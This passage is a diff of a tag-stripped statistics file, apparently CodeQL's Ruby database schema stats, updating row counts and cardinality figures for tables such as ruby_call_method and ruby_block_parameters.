2419 - - - 59 - 72 - 2367 - - - 72 - 88 - 2341 - - - 88 - 114 - 2314 - - - 114 - 208 - 1742 - - - - - - - start_column - id - - - 12 - - - 1 - 2 - 442 - - - 2 - 3 - 585 - - - 3 - 4 - 247 - - - 4 - 5 - 247 - - - 5 - 6 - 273 - - - 6 - 9 - 455 - - - 9 - 15 - 403 - - - 15 - 37 - 390 - - - 37 - 159 - 390 - - - 159 - 700 - 390 - - - 723 - 2453 - 390 - - - 2462 - 7702 - 390 - - - 7795 - 14906 - 390 - - - 16424 - 38206 - 78 - - - - - - - start_column - file - - - 12 - - - 1 - 2 - 1456 - - - 2 - 3 - 481 - - - 3 - 4 - 481 - - - 4 - 9 - 390 - - - 9 - 33 - 390 - - - 34 - 109 - 390 - - - 112 - 353 - 390 - - - 358 - 696 - 390 - - - 698 - 950 - 390 - - - 950 - 1323 - 312 - - - - - - - start_column - start_line - - - 12 - - - 1 - 2 - 533 - - - 2 - 3 - 637 - - - 3 - 4 - 351 - - - 4 - 6 - 416 - - - 6 - 9 - 455 - - - 9 17 - 403 + 2397 - 18 - 63 - 390 + 17 + 27 + 2529 - 64 - 158 - 390 + 27 + 42 + 2371 - 171 - 379 - 390 + 42 + 55 + 2371 - 380 - 735 - 390 + 55 + 68 + 2489 - 735 - 1008 - 390 + 68 + 85 + 2437 - 1010 - 1392 - 325 + 85 + 111 + 2358 + + + 111 + 205 + 1712 - start_column + start_line end_line @@ -3673,69 +3338,49 @@ 1 2 - 533 + 11197 2 3 - 637 + 6468 3 4 - 351 + 2265 4 - 6 - 416 + 5 + 1633 - 6 - 9 - 455 + 5 + 7 + 2661 - 9 - 17 - 403 + 7 + 10 + 2397 + + + 10 + 18 + 2621 18 - 64 - 390 - - - 64 - 159 - 390 - - - 171 - 381 - 390 - - - 385 - 749 - 390 - - - 750 - 1026 - 390 - - - 1027 - 1399 - 325 + 242 + 1923 - start_column + start_line end_column @@ -3744,316 +3389,696 @@ 1 2 - 1274 + 1567 2 - 3 - 728 - - - 3 4 - 403 + 1620 4 - 6 - 429 + 5 + 3464 - 6 - 14 - 390 + 5 + 7 + 2094 - 14 - 35 - 403 + 7 + 11 + 2726 - 35 - 66 - 429 + 11 + 15 + 2463 - 67 - 104 - 390 - - - 104 - 127 - 403 - - - 128 - 178 - 221 - - - - - - - end_line - id - - - 12 - - - 1 - 2 - 286 - - - 3 - 4 - 3316 - - - 4 - 6 - 2458 - - - 6 - 9 - 2497 - - - 9 - 14 - 2471 - - - 14 - 21 - 2393 - - - 21 - 32 - 2341 - - - 32 - 60 - 2367 - - - 60 - 101 - 2314 - - - 101 - 152 - 2354 - - - 152 - 230 - 2341 - - - 230 - 480 - 2314 - - - 482 - 2152 - 2314 - - - 2200 - 9921 - 949 - - - - - - - end_line - file - - - 12 - - - 1 - 2 - 9884 - - - 2 - 3 - 5605 - - - 3 - 6 - 2341 - - - 6 - 9 - 2341 - - - 9 - 14 - 2419 - - - 14 - 22 - 2484 - - - 22 - 49 - 2327 - - - 49 - 220 - 2314 - - - 223 - 1307 - 1001 - - - - - - - end_line - start_line - - - 12 - - - 1 - 2 - 11327 - - - 2 - 3 - 5839 - - - 3 - 4 - 2197 - - - 4 - 6 - 2835 - - - 6 - 8 - 2132 - - - 8 - 12 - 2419 - - - 12 + 15 24 - 2445 - - - 24 - 42 - 1521 - - - - - - - end_line - start_column - - - 12 - - - 1 - 3 - 1430 - - - 3 - 4 - 3446 - - - 4 - 6 - 2757 - - - 6 - 8 - 1729 - - - 8 - 12 - 2354 - - - 12 - 16 - 2354 - - - 16 - 24 - 2406 + 2555 24 39 - 2458 + 2437 39 53 - 2445 + 2371 53 67 - 2432 + 2423 67 - 82 - 2393 + 81 + 2450 - 82 + 81 105 - 2327 + 2423 105 + 144 + 2371 + + + 144 + 208 + 197 + + + + + + + start_column + id + + + 12 + + + 1 + 2 + 461 + + + 2 + 3 + 592 + + + 3 + 4 + 250 + + + 4 + 5 + 250 + + + 5 + 6 + 302 + + + 6 + 9 + 474 + + + 9 + 15 + 408 + + + 15 + 37 + 395 + + + 37 + 160 + 408 + + + 165 + 723 + 395 + + + 738 + 2482 + 395 + + + 2756 + 7833 + 395 + + + 7852 + 16491 + 395 + + + 20774 + 38311 + 65 + + + + + + + start_column + file + + + 12 + + + 1 + 2 + 1409 + + + 2 + 3 + 553 + + + 3 + 4 + 487 + + + 4 + 8 + 421 + + + 8 + 29 + 395 + + + 32 + 98 + 395 + + + 101 + 332 + 395 + + + 338 + 678 + 395 + + + 696 + 945 + 395 + + + 949 + 1328 + 342 + + + + + + + start_column + start_line + + + 12 + + + 1 + 2 + 526 + + + 2 + 3 + 698 + + + 3 + 4 + 289 + + + 4 + 5 + 342 + + + 5 + 7 + 395 + + + 7 + 12 + 395 + + + 12 + 25 + 395 + + + 25 + 84 + 408 + + + 87 + 245 + 395 + + + 261 + 522 + 395 + + + 531 + 873 + 395 + + + 902 + 1128 + 395 + + + 1128 + 1398 + 158 + + + + + + + start_column + end_line + + + 12 + + + 1 + 2 + 526 + + + 2 + 3 + 698 + + + 3 + 4 + 289 + + + 4 + 5 + 342 + + + 5 + 7 + 395 + + + 7 + 12 + 395 + + + 12 + 25 + 395 + + + 25 + 84 + 395 + + + 84 + 242 + 395 + + + 247 + 520 + 395 + + + 529 + 880 + 395 + + + 896 + 1137 + 395 + + + 1140 + 1404 + 171 + + + + + + + start_column + end_column + + + 12 + + + 1 + 2 + 1277 + + + 2 + 3 + 685 + + + 3 + 4 + 500 + + + 4 + 6 + 434 + + + 6 + 14 + 421 + + + 14 + 35 + 408 + + + 35 + 66 + 421 + + + 66 + 101 + 395 + + + 102 + 127 + 408 + + + 127 + 179 + 237 + + + + + + + end_line + id + + + 12 + + + 1 + 3 + 316 + + + 3 + 4 + 3438 + + + 4 + 6 + 2489 + + + 6 + 9 + 2344 + + + 9 + 13 + 2463 + + + 13 + 20 + 2450 + + + 20 + 32 + 2423 + + + 32 + 58 + 2384 + + + 58 + 100 + 2371 + + + 100 + 149 + 2384 + + + 149 + 229 + 2358 + + + 229 + 457 + 2358 + + + 461 + 1977 + 2344 + + + 1999 + 9958 + 1040 + + + + + + + end_line + file + + + 12 + + + 1 + 2 + 10091 + + + 2 + 3 + 5651 + + + 3 + 6 + 2384 + + + 6 + 9 + 2410 + + + 9 + 14 + 2410 + + + 14 + 22 + 2463 + + + 22 + 47 + 2344 + + + 47 + 207 + 2358 + + + 215 + 1312 + 1053 + + + + + + + end_line + start_line + + + 12 + + + 1 + 2 + 11461 + + + 2 + 3 + 5809 + + + 3 + 4 + 2384 + + + 4 + 5 + 1712 + + + 5 + 7 + 2450 + + + 7 + 10 + 2371 + + + 10 + 17 + 2423 + + + 17 + 35 + 2371 + + + 35 + 42 + 184 + + + + + + + end_line + start_column + + + 12 + + + 1 + 3 + 1580 + + + 3 + 4 + 3438 + + + 4 + 6 + 2766 + + + 6 + 8 + 1686 + + + 8 + 12 + 2476 + + + 12 + 16 + 2371 + + + 16 + 25 + 2450 + + + 25 + 39 + 2423 + + + 39 + 53 + 2476 + + + 53 + 66 + 2423 + + + 66 + 80 + 2344 + + + 80 + 104 + 2463 + + + 104 204 - 2184 + 2265 @@ -4069,72 +4094,72 @@ 1 2 - 1417 + 1554 2 3 - 1534 + 1514 3 4 - 2510 + 2371 4 6 - 2367 + 2595 6 8 - 1690 + 1725 8 13 - 2783 + 2832 13 18 - 2549 + 2503 18 28 - 2432 + 2489 28 - 44 - 2445 + 45 + 2568 - 44 + 45 59 - 2393 + 2384 59 - 72 - 2419 + 73 + 2371 - 72 + 73 90 - 2354 + 2371 90 117 - 2327 + 2344 117 208 - 1495 + 1541 @@ -4150,67 +4175,67 @@ 1 2 - 338 + 382 2 3 - 468 + 474 3 5 - 455 + 474 5 7 - 455 + 474 7 - 10 - 403 + 11 + 447 - 10 + 11 19 - 442 + 408 19 50 - 403 + 408 53 - 168 - 390 + 172 + 408 - 169 - 691 - 390 + 173 + 815 + 408 - 806 - 2495 - 390 + 876 + 2748 + 408 - 2618 - 6562 - 390 + 3021 + 6887 + 408 - 6710 - 9993 - 390 + 7035 + 10339 + 408 - 10241 - 19364 - 247 + 10402 + 19444 + 184 @@ -4226,52 +4251,52 @@ 1 2 - 1404 + 1409 2 3 - 585 + 553 3 4 - 429 + 513 4 7 - 390 + 434 7 - 24 - 390 + 26 + 434 - 24 - 94 - 390 + 28 + 107 + 408 - 95 - 314 - 390 + 110 + 364 + 408 - 325 - 676 - 390 + 385 + 753 + 408 - 688 - 977 - 390 + 764 + 1000 + 421 - 979 - 1290 - 403 + 1012 + 1294 + 302 @@ -4287,67 +4312,62 @@ 1 2 - 507 + 553 2 3 - 650 + 632 3 4 - 338 + 329 4 6 - 429 + 487 6 9 - 429 + 434 9 15 - 390 + 408 16 39 - 429 + 434 40 - 138 - 390 + 143 + 421 - 141 - 332 - 390 + 147 + 370 + 408 - 352 - 653 - 390 + 374 + 703 + 421 - 657 - 998 - 390 + 722 + 1049 + 408 - 1011 - 1264 - 390 - - - 1281 - 1401 - 39 + 1050 + 1391 + 355 @@ -4363,62 +4383,62 @@ 1 2 - 884 + 882 2 3 - 338 + 395 3 4 - 520 + 500 4 5 - 325 + 342 5 8 - 416 + 447 8 17 - 403 + 421 17 33 - 429 + 434 33 - 49 - 390 + 50 + 408 - 49 - 64 - 390 + 50 + 65 + 408 - 64 - 81 - 403 + 65 + 82 + 421 - 81 - 95 - 429 + 82 + 96 + 421 - 95 + 97 108 - 234 + 210 @@ -4434,67 +4454,62 @@ 1 2 - 507 + 553 2 3 - 663 + 645 3 4 - 338 + 329 4 6 - 416 + 474 6 9 - 429 + 434 9 15 - 403 + 421 15 - 36 - 390 + 38 + 408 - 37 - 131 - 390 + 40 + 139 + 421 - 133 - 314 - 390 + 143 + 351 + 408 - 314 - 632 - 390 + 362 + 684 + 408 - 637 - 969 - 390 + 693 + 1029 + 421 - 970 - 1181 - 390 - - - 1211 - 1394 - 65 + 1030 + 1384 + 368 @@ -4504,19 +4519,19 @@ ruby_alias_def - 1264 + 1294 id - 1264 + 1294 alias - 1264 + 1294 name - 1264 + 1294 @@ -4530,7 +4545,7 @@ 1 2 - 1264 + 1294 @@ -4546,7 +4561,7 @@ 1 2 - 1264 + 1294 @@ -4562,7 +4577,7 @@ 1 2 - 1264 + 1294 @@ -4578,7 +4593,7 @@ 1 2 - 1264 + 1294 @@ -4594,7 +4609,7 @@ 1 2 - 1264 + 1294 @@ -4610,7 +4625,7 @@ 1 2 - 1264 + 1294 @@ -4723,19 +4738,19 @@ ruby_argument_list_child - 832018 + 846595 ruby_argument_list - 669942 + 681634 index - 429 + 434 child - 832018 + 846595 @@ -4749,17 +4764,17 @@ 1 2 - 567211 + 577166 2 3 - 64884 + 65960 3 34 - 37846 + 38506 @@ -4775,17 +4790,17 @@ 1 2 - 567211 + 577166 2 3 - 64884 + 65960 3 34 - 37846 + 38506 @@ -4801,7 +4816,7 @@ 1 2 - 143 + 144 2 @@ -4825,22 +4840,22 @@ 23 - 43 + 44 39 56 - 378 + 383 39 - 919 - 7900 + 927 + 7931 39 - 51512 - 51513 + 51742 + 51743 13 @@ -4857,7 +4872,7 @@ 1 2 - 143 + 144 2 @@ -4881,22 +4896,22 @@ 23 - 43 + 44 39 56 - 378 + 383 39 - 919 - 7900 + 927 + 7931 39 - 51512 - 51513 + 51742 + 51743 13 @@ -4913,7 +4928,7 @@ 1 2 - 832018 + 846595 @@ -4929,7 +4944,7 @@ 1 2 - 832018 + 846595 @@ -4939,22 +4954,22 @@ ruby_argument_list_def - 670202 + 681897 id - 670202 + 681897 ruby_array_child - 700387 + 702687 ruby_array - 237942 + 238784 index @@ -4962,7 +4977,7 @@ child - 700387 + 702687 @@ -4976,17 +4991,17 @@ 1 2 - 12128 + 12311 2 3 - 212308 + 212726 3 63361 - 13506 + 13747 @@ -5002,17 +5017,17 @@ 1 2 - 12128 + 12311 2 3 - 212308 + 212726 3 63361 - 13506 + 13747 @@ -5052,7 +5067,7 @@ 11 - 237943 + 238785 1294 @@ -5093,7 +5108,7 @@ 11 - 237943 + 238785 1294 @@ -5110,7 +5125,7 @@ 1 2 - 700387 + 702687 @@ -5126,7 +5141,7 @@ 1 2 - 700387 + 702687 @@ -5136,30 +5151,30 @@ ruby_array_def - 246221 + 247148 id - 246221 + 247148 ruby_array_pattern_child - 0 + 8 ruby_array_pattern - 0 + 5 index - 0 + 2 child - 0 + 8 @@ -5169,7 +5184,18 @@ 12 - + + + 1 + 2 + 2 + + + 2 + 3 + 3 + + @@ -5179,7 +5205,18 @@ 12 - + + + 1 + 2 + 2 + + + 2 + 3 + 3 + + @@ -5189,7 +5226,18 @@ 12 - + + + 3 + 4 + 1 + + + 5 + 6 + 1 + + @@ -5199,7 +5247,18 @@ 12 - + + + 3 + 4 + 1 + + + 5 + 6 + 1 + + @@ -5213,7 +5272,7 @@ 1 2 - 2 + 8 @@ -5229,7 +5288,7 @@ 1 2 - 2 + 8 @@ -5287,11 +5346,11 @@ ruby_array_pattern_def - 0 + 5 id - 0 + 5 @@ -5390,19 +5449,19 @@ ruby_assignment_def - 131940 + 134532 id - 131940 + 134532 left - 131940 + 134532 right - 131940 + 134532 @@ -5416,7 +5475,7 @@ 1 2 - 131940 + 134532 @@ -5432,7 +5491,7 @@ 1 2 - 131940 + 134532 @@ -5448,7 +5507,7 @@ 1 2 - 131940 + 134532 @@ -5464,7 +5523,7 @@ 1 2 - 131940 + 134532 @@ -5480,7 +5539,7 @@ 1 2 - 131940 + 134532 @@ -5496,7 +5555,7 @@ 1 2 - 131940 + 134532 @@ -5506,23 +5565,23 @@ ruby_ast_node_info - 9180290 + 9334443 node - 9180290 + 9334443 parent - 3212205 + 3265697 parent_index - 2796 + 2832 loc - 8693375 + 8839652 @@ -5536,7 +5595,7 @@ 1 2 - 9180290 + 9334443 @@ -5552,7 +5611,7 @@ 1 2 - 9180290 + 9334443 @@ -5568,7 +5627,7 @@ 1 2 - 9180290 + 9334443 @@ -5584,27 +5643,27 @@ 1 2 - 517803 + 526210 2 3 - 442358 + 449816 3 4 - 1733980 + 1762919 4 5 - 339055 + 344624 5 216 - 179008 + 182126 @@ -5620,27 +5679,27 @@ 1 2 - 517803 + 526210 2 3 - 442358 + 449816 3 4 - 1733980 + 1762919 4 5 - 339055 + 344624 5 216 - 179008 + 182126 @@ -5656,27 +5715,27 @@ 1 2 - 517803 + 526210 2 3 - 442358 + 449816 3 4 - 1733980 + 1762919 4 5 - 339055 + 344624 5 216 - 179008 + 182126 @@ -5692,57 +5751,57 @@ 1 2 - 455 + 461 2 3 - 195 + 197 3 4 - 390 + 395 4 6 - 234 + 237 6 7 - 234 + 237 7 10 - 234 + 210 10 21 - 208 + 237 21 42 - 221 + 223 43 - 95 - 221 + 96 + 223 - 99 - 491 - 221 + 100 + 495 + 223 - 524 - 246988 - 182 + 530 + 247896 + 184 @@ -5758,57 +5817,57 @@ 1 2 - 455 + 461 2 3 - 195 + 197 3 4 - 390 + 395 4 6 - 234 + 237 6 7 - 234 + 237 7 10 - 234 + 210 10 21 - 208 + 237 21 42 - 221 + 223 43 - 95 - 221 + 96 + 223 - 99 - 491 - 221 + 100 + 495 + 223 - 524 - 246988 - 182 + 530 + 247896 + 184 @@ -5824,57 +5883,57 @@ 1 2 - 455 + 461 2 3 - 195 + 197 3 4 - 390 + 395 4 6 - 234 + 237 6 7 - 234 + 237 7 10 - 234 + 210 10 21 - 208 + 237 21 42 - 221 + 223 43 - 95 - 221 + 96 + 223 - 99 - 491 - 221 + 100 + 495 + 223 - 524 - 246621 - 182 + 530 + 247529 + 184 @@ -5890,12 +5949,12 @@ 1 2 - 8208085 + 8346507 2 4 - 485289 + 493144 @@ -5911,12 +5970,12 @@ 1 2 - 8208085 + 8346507 2 4 - 485289 + 493144 @@ -5932,12 +5991,12 @@ 1 2 - 8211232 + 8349695 2 3 - 482142 + 489956 @@ -5947,19 +6006,19 @@ ruby_bare_string_child - 15074 + 15515 ruby_bare_string - 11622 + 11962 index - 2232 + 2309 child - 15074 + 15515 @@ -5973,12 +6032,12 @@ 1 2 - 11291 + 11621 2 - 2233 - 331 + 2310 + 341 @@ -5994,12 +6053,12 @@ 1 2 - 11291 + 11621 2 - 2233 - 331 + 2310 + 341 @@ -6015,21 +6074,21 @@ 1 2 - 1865 + 1942 2 3 - 81 + 72 3 4 - 267 + 276 4 - 11623 + 11963 19 @@ -6046,21 +6105,21 @@ 1 2 - 1865 + 1942 2 3 - 81 + 72 3 4 - 267 + 276 4 - 11623 + 11963 19 @@ -6077,7 +6136,7 @@ 1 2 - 15074 + 15515 @@ -6093,7 +6152,7 @@ 1 2 - 15074 + 15515 @@ -6103,22 +6162,22 @@ ruby_bare_string_def - 11622 + 11962 id - 11622 + 11962 ruby_bare_symbol_child - 2085 + 8244 ruby_bare_symbol - 2085 + 8244 index @@ -6126,7 +6185,7 @@ child - 2085 + 8244 @@ -6140,7 +6199,7 @@ 1 2 - 2085 + 8244 @@ -6156,7 +6215,7 @@ 1 2 - 2085 + 8244 @@ -6170,8 +6229,8 @@ 12 - 715 - 716 + 3109 + 3110 2 @@ -6186,8 +6245,8 @@ 12 - 715 - 716 + 3109 + 3110 2 @@ -6204,7 +6263,7 @@ 1 2 - 2085 + 8244 @@ -6220,7 +6279,7 @@ 1 2 - 2085 + 8244 @@ -6230,30 +6289,30 @@ ruby_bare_symbol_def - 2085 + 8244 id - 2085 + 8244 ruby_begin_block_child - 44 + 33 ruby_begin_block - 11 + 10 index - 9 + 7 child - 44 + 33 @@ -6287,11 +6346,6 @@ 7 8 - 1 - - - 9 - 10 2 @@ -6328,11 +6382,6 @@ 7 8 - 1 - - - 9 - 10 2 @@ -6352,14 +6401,14 @@ 2 - 3 - 4 + 4 + 5 2 5 6 - 2 + 1 6 @@ -6367,13 +6416,8 @@ 1 - 7 - 8 - 1 - - - 11 - 12 + 10 + 11 1 @@ -6393,14 +6437,14 @@ 2 - 3 - 4 + 4 + 5 2 5 6 - 2 + 1 6 @@ -6408,13 +6452,8 @@ 1 - 7 - 8 - 1 - - - 11 - 12 + 10 + 11 1 @@ -6431,7 +6470,7 @@ 1 2 - 44 + 33 @@ -6447,7 +6486,7 @@ 1 2 - 44 + 33 @@ -6457,30 +6496,30 @@ ruby_begin_block_def - 11 + 10 id - 11 + 10 ruby_begin_child - 7615 + 7663 ruby_begin - 2549 + 2574 index - 38 + 40 child - 7615 + 7663 @@ -6494,17 +6533,17 @@ 1 2 - 160 + 163 2 3 - 1328 + 1348 3 4 - 531 + 535 4 @@ -6514,11 +6553,11 @@ 5 8 - 234 + 232 8 - 39 + 41 84 @@ -6535,17 +6574,17 @@ 1 2 - 160 + 163 2 3 - 1328 + 1348 3 4 - 531 + 535 4 @@ -6555,11 +6594,11 @@ 5 8 - 234 + 232 8 - 39 + 41 84 @@ -6576,7 +6615,7 @@ 1 2 - 1 + 3 2 @@ -6609,23 +6648,23 @@ 3 - 39 - 63 + 40 + 64 3 84 - 185 + 184 3 - 318 - 1062 + 316 + 1064 3 - 2389 - 2550 + 2411 + 2575 2 @@ -6642,7 +6681,7 @@ 1 2 - 1 + 3 2 @@ -6675,23 +6714,23 @@ 3 - 39 - 63 + 40 + 64 3 84 - 185 + 184 3 - 318 - 1062 + 316 + 1064 3 - 2389 - 2550 + 2411 + 2575 2 @@ -6708,7 +6747,7 @@ 1 2 - 7615 + 7663 @@ -6724,7 +6763,7 @@ 1 2 - 7615 + 7663 @@ -6734,26 +6773,26 @@ ruby_begin_def - 2549 + 2574 id - 2549 + 2574 ruby_binary_def - 68619 + 70361 id - 68619 + 70361 left - 68619 + 70361 operator @@ -6761,7 +6800,7 @@ right - 68619 + 70361 @@ -6775,7 +6814,7 @@ 1 2 - 68619 + 70361 @@ -6791,7 +6830,7 @@ 1 2 - 68619 + 70361 @@ -6807,7 +6846,7 @@ 1 2 - 68619 + 70361 @@ -6823,7 +6862,7 @@ 1 2 - 68619 + 70361 @@ -6839,7 +6878,7 @@ 1 2 - 68619 + 70361 @@ -6855,7 +6894,7 @@ 1 2 - 68619 + 70361 @@ -6869,68 +6908,68 @@ 12 - 157 - 178 + 160 + 177 2 - 231 - 378 + 233 + 388 2 - 491 - 576 + 499 + 582 2 - 622 - 632 + 632 + 654 2 - 758 - 836 + 774 + 859 2 - 956 - 970 + 988 + 990 2 - 1011 - 1018 + 1031 + 1044 2 - 1182 - 1258 + 1223 + 1255 2 - 1332 - 1732 + 1346 + 1806 2 - 1804 - 2211 + 1812 + 2245 2 - 2409 - 3329 + 2459 + 3441 2 - 6173 - 6848 + 6303 + 7108 2 - 31539 - 31540 + 32364 + 32365 1 @@ -6945,68 +6984,68 @@ 12 - 157 - 178 + 160 + 177 2 - 231 - 378 + 233 + 388 2 - 491 - 576 + 499 + 582 2 - 622 - 632 + 632 + 654 2 - 758 - 836 + 774 + 859 2 - 956 - 970 + 988 + 990 2 - 1011 - 1018 + 1031 + 1044 2 - 1182 - 1258 + 1223 + 1255 2 - 1332 - 1732 + 1346 + 1806 2 - 1804 - 2211 + 1812 + 2245 2 - 2409 - 3329 + 2459 + 3441 2 - 6173 - 6848 + 6303 + 7108 2 - 31539 - 31540 + 32364 + 32365 1 @@ -7021,68 +7060,68 @@ 12 - 157 - 178 + 160 + 177 2 - 231 - 378 + 233 + 388 2 - 491 - 576 + 499 + 582 2 - 622 - 632 + 632 + 654 2 - 758 - 836 + 774 + 859 2 - 956 - 970 + 988 + 990 2 - 1011 - 1018 + 1031 + 1044 2 - 1182 - 1258 + 1223 + 1255 2 - 1332 - 1732 + 1346 + 1806 2 - 1804 - 2211 + 1812 + 2245 2 - 2409 - 3329 + 2459 + 3441 2 - 6173 - 6848 + 6303 + 7108 2 - 31539 - 31540 + 32364 + 32365 1 @@ -7099,7 +7138,7 @@ 1 2 - 68619 + 70361 @@ -7115,7 +7154,7 @@ 1 2 - 68619 + 70361 @@ -7131,7 +7170,7 @@ 1 2 - 68619 + 70361 @@ -7141,15 +7180,15 @@ ruby_block_argument_child - 6115 + 6295 ruby_block_argument - 6115 + 6295 child - 6115 + 6295 @@ -7163,7 +7202,7 @@ 1 2 - 6115 + 6295 @@ -7179,7 +7218,7 @@ 1 2 - 6115 + 6295 @@ -7189,26 +7228,26 @@ ruby_block_argument_def - 6115 + 6295 id - 6115 + 6295 ruby_block_body - 97983 + 99474 ruby_block - 97983 + 99474 body - 97983 + 99474 @@ -7222,7 +7261,7 @@ 1 2 - 97983 + 99474 @@ -7238,7 +7277,7 @@ 1 2 - 97983 + 99474 @@ -7248,11 +7287,11 @@ ruby_block_body_child - 98126 + 99619 ruby_block_body - 97983 + 99474 index @@ -7260,7 +7299,7 @@ child - 98126 + 99619 @@ -7274,12 +7313,12 @@ 1 2 - 97892 + 99382 2 5 - 91 + 92 @@ -7295,12 +7334,12 @@ 1 2 - 97892 + 99382 2 5 - 91 + 92 @@ -7324,8 +7363,8 @@ 13 - 7534 - 7535 + 7551 + 7552 13 @@ -7350,8 +7389,8 @@ 13 - 7534 - 7535 + 7551 + 7552 13 @@ -7368,7 +7407,7 @@ 1 2 - 98126 + 99619 @@ -7384,7 +7423,7 @@ 1 2 - 98126 + 99619 @@ -7394,48 +7433,48 @@ ruby_block_body_def - 97983 + 99474 id - 97983 + 99474 ruby_block_def - 98296 + 99790 id - 98296 + 99790 ruby_block_parameter_def - 2442 + 2508 id - 2442 + 2508 ruby_block_parameter_name - 2442 + 2508 ruby_block_parameter - 2442 + 2508 name - 2442 + 2508 @@ -7449,7 +7488,7 @@ 1 2 - 2442 + 2508 @@ -7465,7 +7504,7 @@ 1 2 - 2442 + 2508 @@ -7475,15 +7514,15 @@ ruby_block_parameters - 10539 + 10609 ruby_block - 10539 + 10609 parameters - 10539 + 10609 @@ -7497,7 +7536,7 @@ 1 2 - 10539 + 10609 @@ -7513,7 +7552,7 @@ 1 2 - 10539 + 10609 @@ -7523,11 +7562,11 @@ ruby_block_parameters_child - 27656 + 28087 ruby_block_parameters - 23772 + 24260 index @@ -7535,7 +7574,7 @@ child - 27656 + 28087 @@ -7549,17 +7588,17 @@ 1 2 - 20371 + 20816 2 3 - 3053 + 3144 3 6 - 347 + 299 @@ -7575,17 +7614,17 @@ 1 2 - 20371 + 20816 2 3 - 3053 + 3144 3 6 - 347 + 299 @@ -7599,28 +7638,28 @@ 12 - 10 - 11 + 11 + 12 3 - 34 - 35 + 16 + 17 3 - 112 - 113 + 97 + 98 3 - 1097 - 1098 + 1115 + 1116 3 - 7669 - 7670 + 7854 + 7855 3 @@ -7635,28 +7674,28 @@ 12 - 10 - 11 + 11 + 12 3 - 34 - 35 + 16 + 17 3 - 112 - 113 + 97 + 98 3 - 1097 - 1098 + 1115 + 1116 3 - 7669 - 7670 + 7854 + 7855 3 @@ -7673,7 +7712,7 @@ 1 2 - 27656 + 28087 @@ -7689,7 +7728,7 @@ 1 2 - 27656 + 28087 @@ -7699,11 +7738,11 @@ ruby_block_parameters_def - 23772 + 24260 id - 23772 + 24260 @@ -7846,19 +7885,19 @@ ruby_body_statement_child - 606175 + 615417 ruby_body_statement - 195703 + 198807 index - 1103 + 1149 child - 606175 + 615417 @@ -7872,37 +7911,37 @@ 1 2 - 89956 + 91491 2 3 - 35812 + 36347 3 4 - 23304 + 23679 4 5 - 14659 + 14993 5 7 - 15433 + 15602 7 - 22 - 14696 + 23 + 14984 - 22 - 357 - 1841 + 23 + 373 + 1708 @@ -7918,37 +7957,37 @@ 1 2 - 89956 + 91491 2 3 - 35812 + 36347 3 4 - 23304 + 23679 4 5 - 14659 + 14993 5 7 - 15433 + 15602 7 - 22 - 14696 + 23 + 14984 - 22 - 357 - 1841 + 23 + 373 + 1708 @@ -7964,12 +8003,12 @@ 1 2 - 61 + 92 2 3 - 102 + 120 3 @@ -7979,52 +8018,52 @@ 4 5 - 111 + 95 5 7 - 83 + 86 7 10 - 74 + 86 10 13 - 92 + 89 13 - 22 + 23 + 89 + + + 23 + 41 86 - 22 - 39 - 83 + 41 + 70 + 86 - 40 - 66 - 83 + 70 + 143 + 86 - 68 - 128 - 83 + 147 + 613 + 86 - 130 - 418 - 83 - - - 456 - 63135 - 77 + 662 + 64362 + 64 @@ -8040,12 +8079,12 @@ 1 2 - 61 + 92 2 3 - 102 + 120 3 @@ -8055,52 +8094,52 @@ 4 5 - 111 + 95 5 7 - 83 + 86 7 10 - 74 + 86 10 13 - 92 + 89 13 - 22 + 23 + 89 + + + 23 + 41 86 - 22 - 39 - 83 + 41 + 70 + 86 - 40 - 66 - 83 + 70 + 143 + 86 - 68 - 128 - 83 + 147 + 613 + 86 - 130 - 418 - 83 - - - 456 - 63135 - 77 + 662 + 64362 + 64 @@ -8116,7 +8155,7 @@ 1 2 - 606175 + 615417 @@ -8132,7 +8171,7 @@ 1 2 - 606175 + 615417 @@ -8142,26 +8181,26 @@ ruby_body_statement_def - 201560 + 204719 id - 201560 + 204719 ruby_break_child - 354 + 358 ruby_break - 354 + 358 child - 354 + 358 @@ -8175,7 +8214,7 @@ 1 2 - 354 + 358 @@ -8191,7 +8230,7 @@ 1 2 - 354 + 358 @@ -8201,26 +8240,26 @@ ruby_break_def - 3355 + 3367 id - 3355 + 3367 ruby_call_arguments - 667146 + 678801 ruby_call - 667146 + 678801 arguments - 667146 + 678801 @@ -8234,7 +8273,7 @@ 1 2 - 667146 + 678801 @@ -8250,7 +8289,7 @@ 1 2 - 667146 + 678801 @@ -8260,15 +8299,15 @@ ruby_call_block - 233892 + 237614 ruby_call - 233892 + 237614 block - 233892 + 237614 @@ -8282,7 +8321,7 @@ 1 2 - 233892 + 237614 @@ -8298,7 +8337,7 @@ 1 2 - 233892 + 237614 @@ -8308,26 +8347,26 @@ ruby_call_def - 974897 + 991255 id - 974897 + 991255 ruby_call_method - 974897 + 991255 ruby_call - 974897 + 991255 method - 974897 + 991255 @@ -8341,7 +8380,7 @@ 1 2 - 974897 + 991255 @@ -8357,7 +8396,7 @@ 1 2 - 974897 + 991255 @@ -8367,15 +8406,15 @@ ruby_call_operator - 548273 + 554388 ruby_call - 548273 + 554388 operator - 548273 + 554388 @@ -8389,7 +8428,7 @@ 1 2 - 548273 + 554388 @@ -8405,7 +8444,7 @@ 1 2 - 548273 + 554388 @@ -8415,15 +8454,15 @@ ruby_call_receiver - 548273 + 554388 ruby_call - 548273 + 554388 receiver - 548273 + 554388 @@ -8437,7 +8476,7 @@ 1 2 - 548273 + 554388 @@ -8453,7 +8492,7 @@ 1 2 - 548273 + 554388 @@ -8463,19 +8502,19 @@ ruby_case_child - 4153 + 4197 ruby_case__ - 1224 + 1238 index - 68 + 67 child - 4153 + 4197 @@ -8494,27 +8533,27 @@ 2 3 - 316 + 315 3 4 - 511 + 528 4 5 - 189 + 188 5 7 - 105 + 101 7 23 - 65 + 67 @@ -8535,27 +8574,27 @@ 2 3 - 316 + 315 3 4 - 511 + 528 4 5 - 189 + 188 5 7 - 105 + 101 7 23 - 65 + 67 @@ -8579,7 +8618,7 @@ 9 - 3 + 4 5 6 @@ -8590,22 +8629,22 @@ 15 - 22 + 23 6 - 34 + 33 56 6 116 - 282 + 288 6 - 383 - 396 + 389 + 402 6 @@ -8630,7 +8669,7 @@ 9 - 3 + 4 5 6 @@ -8641,22 +8680,22 @@ 15 - 22 + 23 6 - 34 + 33 56 6 116 - 282 + 288 6 - 383 - 396 + 389 + 402 6 @@ -8673,7 +8712,7 @@ 1 2 - 4153 + 4197 @@ -8689,7 +8728,7 @@ 1 2 - 4153 + 4197 @@ -8699,30 +8738,30 @@ ruby_case_def - 1224 + 1238 id - 1224 + 1238 ruby_case_match_clauses - 0 + 9 ruby_case_match - 0 + 5 index - 0 